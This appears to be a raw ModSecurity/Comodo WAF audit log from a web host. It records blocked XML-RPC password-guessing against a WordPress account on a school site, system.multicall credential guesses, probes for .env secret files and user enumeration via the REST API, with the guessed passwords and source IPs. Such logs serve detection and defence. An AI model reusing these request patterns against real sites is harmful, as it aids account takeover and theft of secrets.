"CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117526600208 5272 (- - -) Stopwatch2: 1749117526600208 5272; combined=3710, p1=439, p2=3100, p3=0, p4=0, p5=100, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b50d517b-Z-- --19acc34a-A-- [05/Jun/2025:16:59:46 +0700] aEFqkuth7G2xELALzPZVhAAAAMo 103.236.140.4 45466 103.236.140.4 8181 --19acc34a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --19acc34a-C-- wp.getUsersBlogs kasubagtu qwe!@# --19acc34a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19acc34a-E-- --19acc34a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117586246897 5087 (- - -) Stopwatch2: 1749117586246897 5087; combined=3704, p1=462, p2=3073, p3=0, p4=0, p5=99, sr=99, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19acc34a-Z-- --b4cca96f-A-- [05/Jun/2025:17:00:47 +0700] aEFqz-th7G2xELALzPZV1AAAAM4 103.236.140.4 45652 103.236.140.4 8181 --b4cca96f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b4cca96f-C-- wp.getUsersBlogs kasubagtu login --b4cca96f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4cca96f-E-- --b4cca96f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117647335797 4305 (- - -) Stopwatch2: 1749117647335797 4305; combined=3311, p1=346, p2=2802, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4cca96f-Z-- --405df33a-A-- [05/Jun/2025:17:01:52 +0700] aEFrEOth7G2xELALzPZV7QAAANg 103.236.140.4 45726 103.236.140.4 8181 --405df33a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --405df33a-C-- wp.getUsersBlogs kasubagtu qqq --405df33a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --405df33a-E-- --405df33a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117712772883 4390 (- - -) Stopwatch2: 1749117712772883 4390; combined=3364, p1=382, p2=2795, p3=0, p4=0, p5=108, sr=80, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --405df33a-Z-- --b9f9d503-A-- [05/Jun/2025:17:02:58 +0700] aEFrUuth7G2xELALzPZWGwAAAMw 103.236.140.4 45872 103.236.140.4 8181 --b9f9d503-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b9f9d503-C-- wp.getUsersBlogs kasubagtu 11185 --b9f9d503-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9f9d503-E-- --b9f9d503-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117778041696 4841 (- - -) Stopwatch2: 1749117778041696 4841; combined=3527, p1=422, p2=2914, p3=0, p4=0, p5=110, sr=86, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9f9d503-Z-- --46736b39-A-- [05/Jun/2025:17:03:12 +0700] aEFrYOth7G2xELALzPZWJwAAAMg 103.236.140.4 45902 103.236.140.4 8181 --46736b39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --46736b39-C-- wp.getUsersBlogs kasubagtu 1234%^&* --46736b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46736b39-E-- --46736b39-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117792716119 4393 (- - -) Stopwatch2: 1749117792716119 4393; combined=3362, p1=376, p2=2821, p3=0, p4=0, p5=98, sr=77, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46736b39-Z-- --a8251533-A-- [05/Jun/2025:17:03:12 +0700] aEFrYOth7G2xELALzPZWKAAAAM8 103.236.140.4 45904 103.236.140.4 8181 --a8251533-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.105.188.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.105.188.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --a8251533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8251533-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749117792861885 669 (- - -) Stopwatch2: 1749117792861885 669; combined=284, p1=225, p2=0, p3=0, p4=0, p5=59, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8251533-Z-- --24e33674-A-- [05/Jun/2025:17:03:13 +0700] aEFrYeth7G2xELALzPZWKQAAANM 103.236.140.4 45906 103.236.140.4 8181 --24e33674-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.105.188.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.105.188.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --24e33674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24e33674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749117793512613 621 (- - -) Stopwatch2: 1749117793512613 621; combined=252, p1=217, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24e33674-Z-- --0e54ee3f-A-- [05/Jun/2025:17:03:58 +0700] aEFrjuth7G2xELALzPZWTQAAAME 103.236.140.4 45984 103.236.140.4 8181 --0e54ee3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0e54ee3f-C-- wp.getUsersBlogs kasubagtu z1x2c3v4 --0e54ee3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e54ee3f-E-- --0e54ee3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117838283090 4486 (- - -) Stopwatch2: 1749117838283090 4486; combined=3420, p1=392, p2=2825, p3=0, p4=0, p5=116, sr=84, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e54ee3f-Z-- --9367eb70-A-- [05/Jun/2025:17:04:59 +0700] aEFry-th7G2xELALzPZWfAAAAMo 103.236.140.4 46090 103.236.140.4 8181 --9367eb70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9367eb70-C-- wp.getUsersBlogs kasubagtu pepper --9367eb70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9367eb70-E-- --9367eb70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117899928067 4298 (- - -) Stopwatch2: 1749117899928067 4298; combined=3293, p1=398, p2=2730, p3=0, p4=0, p5=96, sr=117, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9367eb70-Z-- --b8aef436-A-- [05/Jun/2025:17:05:26 +0700] aEFr5n-K7ToMdu-YSIJSJgAAAAc 103.236.140.4 46110 103.236.140.4 8181 --b8aef436-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.159.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.159.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8aef436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8aef436-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117926279691 2112 (- - -) Stopwatch2: 1749117926279691 2112; combined=1062, p1=341, p2=693, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8aef436-Z-- --4cc75d78-A-- [05/Jun/2025:17:06:00 +0700] aEFsCOth7G2xELALzPZWpQAAAMo 103.236.140.4 46196 103.236.140.4 8181 --4cc75d78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4cc75d78-C-- wp.getUsersBlogs kasubagtu thomas --4cc75d78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cc75d78-E-- --4cc75d78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117960902275 5350 (- - -) Stopwatch2: 1749117960902275 5350; combined=3761, p1=459, p2=3113, p3=0, p4=0, p5=118, sr=97, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cc75d78-Z-- --50a89254-A-- [05/Jun/2025:17:06:28 +0700] aEFsJH-K7ToMdu-YSIJSNAAAAAE 103.236.140.4 46274 103.236.140.4 8181 --50a89254-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --50a89254-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix000 --50a89254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50a89254-E-- --50a89254-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117988054864 4525 (- - -) Stopwatch2: 1749117988054864 4525; combined=3588, p1=381, p2=3041, p3=0, p4=0, p5=96, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50a89254-Z-- --8c9e5f5b-A-- [05/Jun/2025:17:07:00 +0700] aEFsROth7G2xELALzPZWwQAAANA 103.236.140.4 46374 103.236.140.4 8181 --8c9e5f5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8c9e5f5b-C-- wp.getUsersBlogs kasubagtu sparky --8c9e5f5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c9e5f5b-E-- --8c9e5f5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118020098306 4441 (- - -) Stopwatch2: 1749118020098306 4441; combined=3290, p1=340, p2=2755, p3=0, p4=0, p5=111, sr=77, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c9e5f5b-Z-- --d8f76370-A-- [05/Jun/2025:17:07:54 +0700] aEFseirHpfaS2Cuwh8UFYAAAAFc 103.236.140.4 46470 103.236.140.4 8181 --d8f76370-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.81.182.244 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.81.182.244 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d8f76370-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh_2019 --d8f76370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8f76370-E-- --d8f76370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.81.182.244 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118074042044 5116 (- - -) Stopwatch2: 1749118074042044 5116; combined=3785, p1=425, p2=3189, p3=0, p4=0, p5=102, sr=101, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8f76370-Z-- --fd0bca05-A-- [05/Jun/2025:17:08:00 +0700] aEFsgOth7G2xELALzPZWyAAAANE 103.236.140.4 46476 103.236.140.4 8181 --fd0bca05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fd0bca05-C-- wp.getUsersBlogs kasubagtu linuxsec --fd0bca05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd0bca05-E-- --fd0bca05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118080588103 5555 (- - -) Stopwatch2: 1749118080588103 5555; combined=4093, p1=476, p2=3217, p3=0, p4=0, p5=215, sr=100, sw=185, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd0bca05-Z-- --6b7d6851-A-- [05/Jun/2025:17:09:00 +0700] aEFsvFwdJdhOudw5hdz47gAAAIk 103.236.140.4 46644 103.236.140.4 8181 --6b7d6851-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6b7d6851-C-- wp.getUsersBlogs kasubagtu chester --6b7d6851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b7d6851-E-- --6b7d6851-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118140374942 4383 (- - -) Stopwatch2: 1749118140374942 4383; combined=3417, p1=381, p2=2864, p3=0, p4=0, p5=100, sr=82, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 